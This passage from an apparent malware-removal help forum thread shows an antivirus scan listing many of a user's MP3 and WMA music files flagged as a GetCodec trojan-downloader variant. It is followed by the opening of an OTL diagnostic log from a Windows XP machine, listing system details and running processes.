    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\18 I'm Shady.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\19 Bad Meets Evil.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Eminem\The Slim Shady LP\20 Still Don't Give a ****.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\01 - Little Things.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\02 - WaldorfWorldwide.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\03 - The Motivation Proclamation.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\04 - East Coast Anthem.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\05 - Festival Song.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\06 - Complicated.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\07 - Seasons.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\08 - I Don't Wanna Stop.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\09 - I Heard You.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\10 - The Click.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\11 - Walk By.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\12 - Let Me Go.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\13 - Screamer.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\14 - Change.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\01 Once Upon A Time- The Battle Of Life And Death.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\02 The Chronicles Of Life And Death.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\03 Walk Away (Maybe).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\04 SOS.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\05 I Just Wanna Live.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\06 Ghost Of You.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\07 Predictable.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\08 Secrets.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\09 The Truth.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\10 The World Is Black.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\11 Mountain.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\12 We Believe.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\13 It Wasn't Enough.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\14 In This World (Murder).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Chronicles of Life and Death (LIFE)\Chronicles of Life and Death (Life Version) 15 Falling Away (Bonus Track).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\01 Good Morning Revival (Intro).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\02 Misery.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\03 The River.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\04 Dance Floor Anthem.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\05 Keep Your Hands Off My Girl.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\06 Victims Of Love.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\07 Where Would We Be Now.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\08 Break Apart Her Heart.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\09 All Black.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\10 Beautiful Place.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\11 Something Else.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\12 Broken Hearts Parade.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\13 March On.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\14 Keep Your Hands Off My Girl (Broken Spindles Remix).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\Good Morning Revival\15 Face The Strange.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\01. Good Charlotte - A New Beginning.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\02. Good Charlotte - The Anthem.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\03. Good Charlotte - Lifestyles of the Rich and Famous.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\04. Good Charlotte - Wondering.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\05. Good Charlotte - The Story of My Old Man.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\06. Good Charlotte - Girls and Boys.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\07. Good Charlotte - My Bloody Valentine.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\08. Good Charlotte - Hold On.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\09. Good Charlotte - Riot Girl.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\10. Good Charlotte - Say Anything.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\11. Good Charlotte - The Day That I Die.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\12. Good Charlotte - The Young and The Hopeless.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\13. Good Charlotte - Emotionaless.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Good Charlotte\The Young and the Hopeless\14. Good Charlotte - Movin' On.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\01 Recapturing The Vibe.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\02 Clown Prince.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\03 The Hard Road.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\04 Stopping All Stations.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\05 Conversations From A Speakeasy [Ft. Omni].mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\06 What A Great Intro.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\07 What A Great Night [DNR].mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\08 City Of Light.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\09 Obese Lowlifes [Ft. Mystro & Braintax].mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\10 Circuit Breaker.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\11 Breathe.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\12 The Blue Blooded.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\13 Monsters Ball.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\14 An Audience With Devil.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Hilltop Hoods\The Hard Road\15 The Captured Vibe.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\kevin Bloody Wilson\Kevin Bloody Wilson - Hey Santa Claus You ****.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\kevin Bloody Wilson\Kevin Bloody Wilson - I Saw Mommy ****ing Santa Claus.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\13 It's On!.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\14 Freak on a Leash.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\15 Got the Life.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\16 Dead Bodies Everywhere.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\17 Children of the Korn.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\18 B.B.K.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\19 Pretty.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\20 All in the Family.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\21 Reclaim My Place.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\22 Justin.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\23 Seed.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\24 Cameltosis.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Follow the Leader\25 My Gift to You.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\01 Blind.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\02 Ball Tongue.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\03 Need To.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\04 Clown.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\05 Divine.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\06 Faget.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\07 Shoots and Ladders.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\08 Predictable.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\09 Fake.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\10 Lies.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\11 Helmet in the Bush.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Korn\Korn\12 Daddy.wma a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Linkin Park\Linkin Park - Behind Your Lies.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Linkin Park\Linkin Park - No More Sorrow.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\01-the_fray-she_is.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\02-the_fray-over_my_head_(cable_car).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\03-the_fray-how_to_save_a_life.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\04-the_fray-all_at_once.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\05-the_fray-fall_away.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\06-the_fray-heaven_forbid.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\07-the_fray-look_after_you.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\08-the_fray-hundred.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\09-the_fray-vienna.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\10-the_fray-dead_wrong.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\11-the_fray-little_house.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\The Fray - How To Save A Life\12-the_fray-trust_me.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wierd Al\Weird Al - White and Nerdy.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wierd Al\Weird Al Yankovich - Eat It ( Michael Jackson Parody ).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wierd Al\Weird Al Yankovich - I Wanna Be A Stormtrooper (Starwars).mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wierd Al\Wierd Al Yankovich - Spongebob Squarepants.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\01 Dimension.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\02 White Unicorn.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\03 Woman.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\04 Where Eagles Have Been.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\05 Apple Tree.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\06 Joker & The Thief.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\07 Colossal.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\08 Mind's Eye.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\09 Pyramid.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\10 Witchcraft.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\11 Tales.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\12 Love Train.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
    C:\Documents and Settings\Marshall\My Documents\My Music\Wolfmother\13 Vagabond.mp3 a variant of WMA/TrojanDownloader.GetCodec.gen trojan 00000000000000000000000000000000 I
     
  17. 2010/12/05
    Cosmic Jester

    OTL logfile created on: 6/12/2010 12:47:58 PM - Run 1
    OTL by OldTimer - Version 3.2.17.3 Folder = C:\FIX THIS PC\BBS\OTL
    Windows XP Professional Edition Service Pack 2 (Version = 5.1.2600) - Type = NTWorkstation
    Internet Explorer (Version = 6.0.2900.2180)
    Locale: 00000C09 | Country: Australia | Language: ENA | Date Format: d/MM/yyyy

    2.00 Gb Total Physical Memory | 1.00 Gb Available Physical Memory | 51.00% Memory free
    4.00 Gb Paging File | 3.00 Gb Available in Paging File | 80.00% Paging File free
    Paging file location(s): c:\pagefile.sys 2046 4092 [binary data]

    %SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
    Drive C: | 232.88 Gb Total Space | 95.97 Gb Free Space | 41.21% Space Free | Partition Type: NTFS
    Drive E: | 0.38 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS

    Computer Name: MARSHALL-D40729 | User Name: Marshall | Logged in as Administrator.
    Boot Mode: Normal | Scan Mode: Current user | Quick Scan
    Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

    ========== Processes (SafeList) ==========

    PRC - [2010/11/29 17:42:16 | 000,363,344 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
    PRC - [2010/11/29 17:42:14 | 000,443,728 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
    PRC - [2010/11/22 10:59:04 | 004,177,272 | ---- | M] (Sysinternals - www.sysinternals.com) -- C:\FIX THIS PC\procexp.exe
    PRC - [2010/11/10 07:08:58 | 000,146,000 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
    PRC - [2010/11/06 08:31:08 | 000,575,488 | ---- | M] (OldTimer Tools) -- C:\FIX THIS PC\BBS\OTL\OTL.exe
    PRC - [2010/10/29 15:57:38 | 000,016,856 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\plugin-container.exe
    PRC - [2010/10/29 15:57:37 | 000,912,344 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\firefox.exe
    PRC - [2010/10/29 10:32:48 | 001,352,272 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPointP\SetPoint.exe
    PRC - [2010/10/16 00:40:40 | 000,037,664 | ---- | M] (Apple Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    PRC - [2010/07/17 06:00:10 | 000,145,184 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\java.exe
    PRC - [2010/05/20 18:19:16 | 000,088,176 | ---- | M] (McAfee, Inc.) -- c:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    PRC - [2009/09/28 12:48:08 | 000,264,040 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft LifeChat\LifeChat.exe
    PRC - [2008/12/22 14:59:20 | 000,787,816 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Live\Device Manager\msgrdvmn.exe
    PRC - [2007/09/02 13:58:52 | 000,495,616 | ---- | M] () -- C:\Program Files\RocketDock\RocketDock.exe
